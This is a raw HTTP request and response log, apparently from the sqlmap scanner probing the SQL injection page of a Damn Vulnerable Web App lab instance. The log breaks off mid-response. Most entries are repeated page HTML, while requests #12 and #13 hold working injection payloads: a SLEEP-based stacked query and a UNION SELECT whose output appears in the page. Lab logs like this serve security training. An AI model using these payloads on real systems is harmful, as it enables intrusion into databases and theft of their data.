'../../vulnerabilities/view_help.php?id=sqli&security=low' )"> <input type="button" value="View Source" class="popup_button" onClick="javascript:popUp( '../../vulnerabilities/view_source.php?id=sqli&security=low' )"> <div align="left"><b>Username:</b> admin<br /><b>Security Level:</b> low<br /><b>PHPIDS:</b> disabled</div> </div> <div id="footer"> <p>Damn Vulnerable Web Application (DVWA) v1.0.7</p> </div> </div> </body> </html> ############################################################################ HTTP request [#8]: GET /vulnerabilities/sqli/?id=test&Submit=Submit HTTP/1.1 Accept-Encoding: identity Accept-language: en-us,en;q=0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-agent: sqlmap/1.0-dev (r4372) (http://www.sqlmap.org) Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Host: 172.16.171.134 Cookie: PHPSESSID=77tko7r0oi19i2ndst212lq4l0; security=low Pragma: no-cache Cache-control: no-cache,no-store Connection: close HTTP response [#8] (200 OK): Content-length: 4333 X-powered-by: PHP/5.3.1 Expires: Tue, 23 Jun 2009 12:00:00 GMT Uri: http://172.16.171.134:80/vulnerabilities/sqli/?id=test&Submit=Submit Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1 Connection: close Pragma: no-cache Cache-control: no-cache, must-revalidate Date: Fri, 02 Sep 2011 00:47:55 GMT Content-type: text/html;charset=utf-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>Damn Vulnerable Web App (DVWA) v1.0.7 :: Vulnerability: SQL Injection</title> <link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" /> <link rel="icon" type="\image/ico" href="../../favicon.ico" /> <script type="text/javascript" src="../../dvwa/js/dvwaPage.js"></script> </head> <body class="home"> <div id="container"> <div id="header"> <img src="../../dvwa/images/logo.png" alt="Damn Vulnerable Web App" /> </div> <div id="main_menu"> <div id="main_menu_padded"> <ul><li onclick="window.location='../../.'" class=""><a href="../../.">Home</a></li><li onclick="window.location='../../instructions.php'" class=""><a href="../../instructions.php">Instructions</a></li><li onclick="window.location='../../setup.php'" class=""><a href="../../setup.php">Setup</a></li></ul><ul><li onclick="window.location='../../vulnerabilities/brute/.'" class=""><a href="../../vulnerabilities/brute/.">Brute Force</a></li><li onclick="window.location='../../vulnerabilities/exec/.'" class=""><a href="../../vulnerabilities/exec/.">Command Execution</a></li><li onclick="window.location='../../vulnerabilities/csrf/.'" class=""><a href="../../vulnerabilities/csrf/.">CSRF</a></li><li onclick="window.location='../../vulnerabilities/fi/.?page=include.php'" class=""><a href="../../vulnerabilities/fi/.?page=include.php">File Inclusion</a></li><li onclick="window.location='../../vulnerabilities/sqli/.'" class="selected"><a href="../../vulnerabilities/sqli/.">SQL Injection</a></li><li onclick="window.location='../../vulnerabilities/sqli_blind/.'" class=""><a href="../../vulnerabilities/sqli_blind/.">SQL Injection (Blind)</a></li><li onclick="window.location='../../vulnerabilities/upload/.'" class=""><a href="../../vulnerabilities/upload/.">Upload</a></li><li onclick="window.location='../../vulnerabilities/xss_r/.'" class=""><a href="../../vulnerabilities/xss_r/.">XSS reflected</a></li><li onclick="window.location='../../vulnerabilities/xss_s/.'" class=""><a href="../../vulnerabilities/xss_s/.">XSS stored</a></li></ul><ul><li onclick="window.location='../../security.php'" class=""><a href="../../security.php">DVWA Security</a></li><li onclick="window.location='../../phpinfo.php'" class=""><a href="../../phpinfo.php">PHP Info</a></li><li onclick="window.location='../../about.php'" class=""><a href="../../about.php">About</a></li></ul><ul><li onclick="window.location='../../logout.php'" class=""><a href="../../logout.php">Logout</a></li></ul> </div> </div> <div id="main_body"> <div class="body_padded"> <h1>Vulnerability: SQL Injection</h1> <div class="vulnerable_code_area"> <h3>User ID:</h3> <form action="#" method="GET"> <input type="text" name="id"> <input type="submit" name="Submit" value="Submit"> </form> </div> <h2>More info</h2> <ul> <li><a href="http://hiderefer.com/?http://www.securiteam.com/securityreviews/5DP0N1P76E.html" target="_blank">http://www.securiteam.com/securityreviews/5DP0N1P76E.html</a></li> <li><a href="http://hiderefer.com/?http://en.wikipedia.org/wiki/SQL_injection" target="_blank">http://en.wikipedia.org/wiki/SQL_injection</a></li> <li><a href="http://hiderefer.com/?http://www.unixwiz.net/techtips/sql-injection.html" target="_blank">http://www.unixwiz.net/techtips/sql-injection.html</a></li> </ul> </div> <br /> <br /> </div> <div class="clear"> </div> <div id="system_info"> <input type="button" value="View Help" class="popup_button" onClick="javascript:popUp( '../../vulnerabilities/view_help.php?id=sqli&security=low' )"> <input type="button" value="View Source" class="popup_button" onClick="javascript:popUp( '../../vulnerabilities/view_source.php?id=sqli&security=low' )"> <div align="left"><b>Username:</b> admin<br /><b>Security Level:</b> low<br /><b>PHPIDS:</b> disabled</div> </div> <div id="footer"> <p>Damn Vulnerable Web Application (DVWA) v1.0.7</p> </div> </div> </body> </html> ############################################################################ HTTP request [#9]: GET /vulnerabilities/sqli/?id=test&Submit=Submit HTTP/1.1 Accept-Encoding: identity Accept-language: en-us,en;q=0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-agent: sqlmap/1.0-dev (r4372) (http://www.sqlmap.org) Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Host: 172.16.171.134 Cookie: PHPSESSID=77tko7r0oi19i2ndst212lq4l0; security=low Pragma: no-cache Cache-control: no-cache,no-store Connection: close HTTP response [#9] (200 OK): Content-length: 4333 X-powered-by: PHP/5.3.1 Expires: Tue, 23 Jun 2009 12:00:00 GMT Uri: http://172.16.171.134:80/vulnerabilities/sqli/?id=test&Submit=Submit Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1 Connection: close Pragma: no-cache Cache-control: no-cache, must-revalidate Date: Fri, 02 Sep 2011 00:47:55 GMT Content-type: text/html;charset=utf-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>Damn Vulnerable Web App (DVWA) v1.0.7 :: Vulnerability: SQL Injection</title> <link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" /> <link rel="icon" type="\image/ico" href="../../favicon.ico" /> <script type="text/javascript" src="../../dvwa/js/dvwaPage.js"></script> </head> <body class="home"> <div id="container"> <div id="header"> <img src="../../dvwa/images/logo.png" alt="Damn Vulnerable Web App" /> </div> <div id="main_menu"> <div id="main_menu_padded"> <ul><li onclick="window.location='../../.'" class=""><a href="../../.">Home</a></li><li onclick="window.location='../../instructions.php'" class=""><a href="../../instructions.php">Instructions</a></li><li onclick="window.location='../../setup.php'" class=""><a href="../../setup.php">Setup</a></li></ul><ul><li onclick="window.location='../../vulnerabilities/brute/.'" class=""><a href="../../vulnerabilities/brute/.">Brute Force</a></li><li onclick="window.location='../../vulnerabilities/exec/.'" class=""><a href="../../vulnerabilities/exec/.">Command Execution</a></li><li onclick="window.location='../../vulnerabilities/csrf/.'" class=""><a href="../../vulnerabilities/csrf/.">CSRF</a></li><li onclick="window.location='../../vulnerabilities/fi/.?page=include.php'" class=""><a href="../../vulnerabilities/fi/.?page=include.php">File Inclusion</a></li><li onclick="window.location='../../vulnerabilities/sqli/.'" class="selected"><a href="../../vulnerabilities/sqli/.">SQL Injection</a></li><li onclick="window.location='../../vulnerabilities/sqli_blind/.'" class=""><a href="../../vulnerabilities/sqli_blind/.">SQL Injection (Blind)</a></li><li onclick="window.location='../../vulnerabilities/upload/.'" class=""><a href="../../vulnerabilities/upload/.">Upload</a></li><li onclick="window.location='../../vulnerabilities/xss_r/.'" class=""><a href="../../vulnerabilities/xss_r/.">XSS reflected</a></li><li onclick="window.location='../../vulnerabilities/xss_s/.'" class=""><a href="../../vulnerabilities/xss_s/.">XSS stored</a></li></ul><ul><li onclick="window.location='../../security.php'" class=""><a href="../../security.php">DVWA Security</a></li><li onclick="window.location='../../phpinfo.php'" class=""><a href="../../phpinfo.php">PHP Info</a></li><li onclick="window.location='../../about.php'" class=""><a href="../../about.php">About</a></li></ul><ul><li onclick="window.location='../../logout.php'" class=""><a href="../../logout.php">Logout</a></li></ul> </div> </div> <div id="main_body"> <div class="body_padded"> <h1>Vulnerability: SQL Injection</h1> <div class="vulnerable_code_area"> <h3>User ID:</h3> <form action="#" method="GET"> <input type="text" name="id"> <input type="submit" name="Submit" value="Submit"> </form> </div> <h2>More info</h2> <ul> <li><a href="http://hiderefer.com/?http://www.securiteam.com/securityreviews/5DP0N1P76E.html" target="_blank">http://www.securiteam.com/securityreviews/5DP0N1P76E.html</a></li> <li><a href="http://hiderefer.com/?http://en.wikipedia.org/wiki/SQL_injection" target="_blank">http://en.wikipedia.org/wiki/SQL_injection</a></li> <li><a href="http://hiderefer.com/?http://www.unixwiz.net/techtips/sql-injection.html" target="_blank">http://www.unixwiz.net/techtips/sql-injection.html</a></li> </ul> </div> <br /> <br /> </div> <div class="clear"> </div> <div id="system_info"> <input type="button" value="View Help" class="popup_button" onClick="javascript:popUp( '../../vulnerabilities/view_help.php?id=sqli&security=low' )"> <input type="button" value="View Source" class="popup_button" onClick="javascript:popUp( '../../vulnerabilities/view_source.php?id=sqli&security=low' )"> <div align="left"><b>Username:</b> admin<br /><b>Security Level:</b> low<br /><b>PHPIDS:</b> disabled</div> </div> <div id="footer"> <p>Damn Vulnerable Web Application (DVWA) v1.0.7</p> </div> </div> </body> </html> ############################################################################ HTTP request [#10]: GET /vulnerabilities/sqli/?id=test&Submit=Submit HTTP/1.1 Accept-Encoding: identity Accept-language: en-us,en;q=0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-agent: sqlmap/1.0-dev (r4372) (http://www.sqlmap.org) Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Host: 172.16.171.134 Cookie: PHPSESSID=77tko7r0oi19i2ndst212lq4l0; security=low Pragma: no-cache Cache-control: no-cache,no-store Connection: close HTTP response [#10] (200 OK): Content-length: 4333 X-powered-by: PHP/5.3.1 Expires: Tue, 23 Jun 2009 12:00:00 GMT Uri: http://172.16.171.134:80/vulnerabilities/sqli/?id=test&Submit=Submit Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1 Connection: close Pragma: no-cache Cache-control: no-cache, must-revalidate Date: Fri, 02 Sep 2011 00:47:55 GMT Content-type: text/html;charset=utf-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>Damn Vulnerable Web App (DVWA) v1.0.7 :: Vulnerability: SQL Injection</title> <link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" /> <link rel="icon" type="\image/ico" href="../../favicon.ico" /> <script type="text/javascript" src="../../dvwa/js/dvwaPage.js"></script> </head> <body class="home"> <div id="container"> <div id="header"> <img src="../../dvwa/images/logo.png" alt="Damn Vulnerable Web App" /> </div> <div id="main_menu"> <div id="main_menu_padded"> <ul><li onclick="window.location='../../.'" class=""><a href="../../.">Home</a></li><li onclick="window.location='../../instructions.php'" class=""><a href="../../instructions.php">Instructions</a></li><li onclick="window.location='../../setup.php'" class=""><a href="../../setup.php">Setup</a></li></ul><ul><li onclick="window.location='../../vulnerabilities/brute/.'" class=""><a href="../../vulnerabilities/brute/.">Brute Force</a></li><li onclick="window.location='../../vulnerabilities/exec/.'" class=""><a href="../../vulnerabilities/exec/.">Command Execution</a></li><li onclick="window.location='../../vulnerabilities/csrf/.'" class=""><a href="../../vulnerabilities/csrf/.">CSRF</a></li><li onclick="window.location='../../vulnerabilities/fi/.?page=include.php'" class=""><a href="../../vulnerabilities/fi/.?page=include.php">File Inclusion</a></li><li onclick="window.location='../../vulnerabilities/sqli/.'" class="selected"><a href="../../vulnerabilities/sqli/.">SQL Injection</a></li><li onclick="window.location='../../vulnerabilities/sqli_blind/.'" class=""><a href="../../vulnerabilities/sqli_blind/.">SQL Injection (Blind)</a></li><li onclick="window.location='../../vulnerabilities/upload/.'" class=""><a href="../../vulnerabilities/upload/.">Upload</a></li><li onclick="window.location='../../vulnerabilities/xss_r/.'" class=""><a href="../../vulnerabilities/xss_r/.">XSS reflected</a></li><li onclick="window.location='../../vulnerabilities/xss_s/.'" class=""><a href="../../vulnerabilities/xss_s/.">XSS stored</a></li></ul><ul><li onclick="window.location='../../security.php'" class=""><a href="../../security.php">DVWA Security</a></li><li onclick="window.location='../../phpinfo.php'" class=""><a href="../../phpinfo.php">PHP Info</a></li><li onclick="window.location='../../about.php'" class=""><a href="../../about.php">About</a></li></ul><ul><li onclick="window.location='../../logout.php'" class=""><a href="../../logout.php">Logout</a></li></ul> </div> </div> <div id="main_body"> <div class="body_padded"> <h1>Vulnerability: SQL Injection</h1> <div class="vulnerable_code_area"> <h3>User ID:</h3> <form action="#" method="GET"> <input type="text" name="id"> <input type="submit" name="Submit" value="Submit"> </form> </div> <h2>More info</h2> <ul> <li><a href="http://hiderefer.com/?http://www.securiteam.com/securityreviews/5DP0N1P76E.html" target="_blank">http://www.securiteam.com/securityreviews/5DP0N1P76E.html</a></li> <li><a href="http://hiderefer.com/?http://en.wikipedia.org/wiki/SQL_injection" target="_blank">http://en.wikipedia.org/wiki/SQL_injection</a></li> <li><a href="http://hiderefer.com/?http://www.unixwiz.net/techtips/sql-injection.html" target="_blank">http://www.unixwiz.net/techtips/sql-injection.html</a></li> </ul> </div> <br /> <br /> </div> <div class="clear"> </div> <div id="system_info"> <input type="button" value="View Help" class="popup_button" onClick="javascript:popUp( '../../vulnerabilities/view_help.php?id=sqli&security=low' )"> <input type="button" value="View Source" class="popup_button" onClick="javascript:popUp( '../../vulnerabilities/view_source.php?id=sqli&security=low' )"> <div align="left"><b>Username:</b> admin<br /><b>Security Level:</b> low<br /><b>PHPIDS:</b> disabled</div> </div> <div id="footer"> <p>Damn Vulnerable Web Application (DVWA) v1.0.7</p> </div> </div> </body> </html> ############################################################################ HTTP request [#11]: GET /vulnerabilities/sqli/?id=test&Submit=Submit HTTP/1.1 Accept-Encoding: identity Accept-language: en-us,en;q=0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-agent: sqlmap/1.0-dev (r4372) (http://www.sqlmap.org) Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Host: 172.16.171.134 Cookie: PHPSESSID=77tko7r0oi19i2ndst212lq4l0; security=low Pragma: no-cache Cache-control: no-cache,no-store Connection: close HTTP response [#11] (200 OK): Content-length: 4333 X-powered-by: PHP/5.3.1 Expires: Tue, 23 Jun 2009 12:00:00 GMT Uri: http://172.16.171.134:80/vulnerabilities/sqli/?id=test&Submit=Submit Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1 Connection: close Pragma: no-cache Cache-control: no-cache, must-revalidate Date: Fri, 02 Sep 2011 00:47:55 GMT Content-type: text/html;charset=utf-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>Damn Vulnerable Web App (DVWA) v1.0.7 :: Vulnerability: SQL Injection</title> <link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" /> <link rel="icon" type="\image/ico" href="../../favicon.ico" /> <script type="text/javascript" src="../../dvwa/js/dvwaPage.js"></script> </head> <body class="home"> <div id="container"> <div id="header"> <img src="../../dvwa/images/logo.png" alt="Damn Vulnerable Web App" /> </div> <div id="main_menu"> <div id="main_menu_padded"> <ul><li onclick="window.location='../../.'" class=""><a href="../../.">Home</a></li><li onclick="window.location='../../instructions.php'" class=""><a href="../../instructions.php">Instructions</a></li><li onclick="window.location='../../setup.php'" class=""><a href="../../setup.php">Setup</a></li></ul><ul><li onclick="window.location='../../vulnerabilities/brute/.'" class=""><a href="../../vulnerabilities/brute/.">Brute Force</a></li><li onclick="window.location='../../vulnerabilities/exec/.'" class=""><a href="../../vulnerabilities/exec/.">Command Execution</a></li><li onclick="window.location='../../vulnerabilities/csrf/.'" class=""><a href="../../vulnerabilities/csrf/.">CSRF</a></li><li onclick="window.location='../../vulnerabilities/fi/.?page=include.php'" class=""><a href="../../vulnerabilities/fi/.?page=include.php">File Inclusion</a></li><li onclick="window.location='../../vulnerabilities/sqli/.'" class="selected"><a href="../../vulnerabilities/sqli/.">SQL Injection</a></li><li onclick="window.location='../../vulnerabilities/sqli_blind/.'" class=""><a href="../../vulnerabilities/sqli_blind/.">SQL Injection (Blind)</a></li><li onclick="window.location='../../vulnerabilities/upload/.'" class=""><a href="../../vulnerabilities/upload/.">Upload</a></li><li onclick="window.location='../../vulnerabilities/xss_r/.'" class=""><a href="../../vulnerabilities/xss_r/.">XSS reflected</a></li><li onclick="window.location='../../vulnerabilities/xss_s/.'" class=""><a href="../../vulnerabilities/xss_s/.">XSS stored</a></li></ul><ul><li onclick="window.location='../../security.php'" class=""><a href="../../security.php">DVWA Security</a></li><li onclick="window.location='../../phpinfo.php'" class=""><a href="../../phpinfo.php">PHP Info</a></li><li onclick="window.location='../../about.php'" class=""><a href="../../about.php">About</a></li></ul><ul><li onclick="window.location='../../logout.php'" class=""><a href="../../logout.php">Logout</a></li></ul> </div> </div> <div id="main_body"> <div class="body_padded"> <h1>Vulnerability: SQL Injection</h1> <div class="vulnerable_code_area"> <h3>User ID:</h3> <form action="#" method="GET"> <input type="text" name="id"> <input type="submit" name="Submit" value="Submit"> </form> </div> <h2>More info</h2> <ul> <li><a href="http://hiderefer.com/?http://www.securiteam.com/securityreviews/5DP0N1P76E.html" target="_blank">http://www.securiteam.com/securityreviews/5DP0N1P76E.html</a></li> <li><a href="http://hiderefer.com/?http://en.wikipedia.org/wiki/SQL_injection" target="_blank">http://en.wikipedia.org/wiki/SQL_injection</a></li> <li><a href="http://hiderefer.com/?http://www.unixwiz.net/techtips/sql-injection.html" target="_blank">http://www.unixwiz.net/techtips/sql-injection.html</a></li> </ul> </div> <br /> <br /> </div> <div class="clear"> </div> <div id="system_info"> <input type="button" value="View Help" class="popup_button" onClick="javascript:popUp( '../../vulnerabilities/view_help.php?id=sqli&security=low' )"> <input type="button" value="View Source" class="popup_button" onClick="javascript:popUp( '../../vulnerabilities/view_source.php?id=sqli&security=low' )"> <div align="left"><b>Username:</b> admin<br /><b>Security Level:</b> low<br /><b>PHPIDS:</b> disabled</div> </div> <div id="footer"> <p>Damn Vulnerable Web Application (DVWA) v1.0.7</p> </div> </div> </body> </html> ############################################################################ HTTP request [#12]: GET /vulnerabilities/sqli/?id=test%27%3B%20SELECT%20SLEEP%285%29%3B%20%23&Submit=Submit HTTP/1.1 Accept-Encoding: identity Accept-language: en-us,en;q=0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-agent: sqlmap/1.0-dev (r4372) (http://www.sqlmap.org) Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Host: 172.16.171.134 Cookie: PHPSESSID=77tko7r0oi19i2ndst212lq4l0; security=low Pragma: no-cache Cache-control: no-cache,no-store Connection: close HTTP response [#12] (200 OK): Content-length: 176 X-powered-by: PHP/5.3.1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Uri: http://172.16.171.134:80/vulnerabilities/sqli/?id=test%27%3B%20SELECT%20SLEEP%285%29%3B%20%23&Submit=Submit Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1 Connection: close Pragma: no-cache Cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Date: Fri, 02 Sep 2011 00:47:55 GMT Content-type: text/html <pre>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'SELECT SLEEP(5); #'' at line 1</pre> ############################################################################ HTTP request [#13]: GET /vulnerabilities/sqli/?id=test%27%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%28CHAR%2858%2C121%2C98%2C120%2C58%29%2CCHAR%2898%2C80%2C98%2C101%2C105%2C111%2C119%2C69%2C84%2C107%29%2CCHAR%2858%2C104%2C120%2C106%2C58%29%29%20%23&Submit=Submit HTTP/1.1 Accept-Encoding: identity Accept-language: en-us,en;q=0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-agent: sqlmap/1.0-dev (r4372) (http://www.sqlmap.org) Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Host: 172.16.171.134 Cookie: PHPSESSID=77tko7r0oi19i2ndst212lq4l0; security=low Pragma: no-cache Cache-control: no-cache,no-store Connection: close HTTP response [#13] (200 OK): Content-length: 4523 X-powered-by: PHP/5.3.1 Expires: Tue, 23 Jun 2009 12:00:00 GMT Uri: http://172.16.171.134:80/vulnerabilities/sqli/?id=test%27%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%28CHAR%2858%2C121%2C98%2C120%2C58%29%2CCHAR%2898%2C80%2C98%2C101%2C105%2C111%2C119%2C69%2C84%2C107%29%2CCHAR%2858%2C104%2C120%2C106%2C58%29%29%20%23&Submit=Submit Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1 Connection: close Pragma: no-cache Cache-control: no-cache, must-revalidate Date: Fri, 02 Sep 2011 00:47:55 GMT Content-type: text/html;charset=utf-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>Damn Vulnerable Web App (DVWA) v1.0.7 :: Vulnerability: SQL Injection</title> <link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" /> <link rel="icon" type="\image/ico" href="../../favicon.ico" /> <script type="text/javascript" src="../../dvwa/js/dvwaPage.js"></script> </head> <body class="home"> <div id="container"> <div id="header"> <img src="../../dvwa/images/logo.png" alt="Damn Vulnerable Web App" /> </div> <div id="main_menu"> <div id="main_menu_padded"> <ul><li onclick="window.location='../../.'" class=""><a href="../../.">Home</a></li><li onclick="window.location='../../instructions.php'" class=""><a href="../../instructions.php">Instructions</a></li><li onclick="window.location='../../setup.php'" class=""><a href="../../setup.php">Setup</a></li></ul><ul><li onclick="window.location='../../vulnerabilities/brute/.'" class=""><a href="../../vulnerabilities/brute/.">Brute Force</a></li><li onclick="window.location='../../vulnerabilities/exec/.'" class=""><a href="../../vulnerabilities/exec/.">Command Execution</a></li><li onclick="window.location='../../vulnerabilities/csrf/.'" class=""><a href="../../vulnerabilities/csrf/.">CSRF</a></li><li onclick="window.location='../../vulnerabilities/fi/.?page=include.php'" class=""><a href="../../vulnerabilities/fi/.?page=include.php">File Inclusion</a></li><li onclick="window.location='../../vulnerabilities/sqli/.'" class="selected"><a href="../../vulnerabilities/sqli/.">SQL Injection</a></li><li onclick="window.location='../../vulnerabilities/sqli_blind/.'" class=""><a href="../../vulnerabilities/sqli_blind/.">SQL Injection (Blind)</a></li><li onclick="window.location='../../vulnerabilities/upload/.'" class=""><a href="../../vulnerabilities/upload/.">Upload</a></li><li onclick="window.location='../../vulnerabilities/xss_r/.'" class=""><a href="../../vulnerabilities/xss_r/.">XSS reflected</a></li><li onclick="window.location='../../vulnerabilities/xss_s/.'" class=""><a href="../../vulnerabilities/xss_s/.">XSS stored</a></li></ul><ul><li onclick="window.location='../../security.php'" class=""><a href="../../security.php">DVWA Security</a></li><li onclick="window.location='../../phpinfo.php'" class=""><a href="../../phpinfo.php">PHP Info</a></li><li onclick="window.location='../../about.php'" class=""><a href="../../about.php">About</a></li></ul><ul><li onclick="window.location='../../logout.php'" class=""><a href="../../logout.php">Logout</a></li></ul> </div> </div> <div id="main_body"> <div class="body_padded"> <h1>Vulnerability: SQL Injection</h1> <div class="vulnerable_code_area"> <h3>User ID:</h3> <form action="#" method="GET"> <input type="text" name="id"> <input type="submit" name="Submit" value="Submit"> </form> <pre>ID: test' UNION ALL SELECT NULL, CONCAT(CHAR(58,121,98,120,58),CHAR(98,80,98,101,105,111,119,69,84,107),CHAR(58,104,120,106,58)) #<br>First name: <br>Surname: :ybx:bPbeiowETk:hxj:</pre> </div> <h2>More info</h2> <ul> <li><a href="http://hiderefer.com/?http://www.securiteam.com/... [truncated message content] |
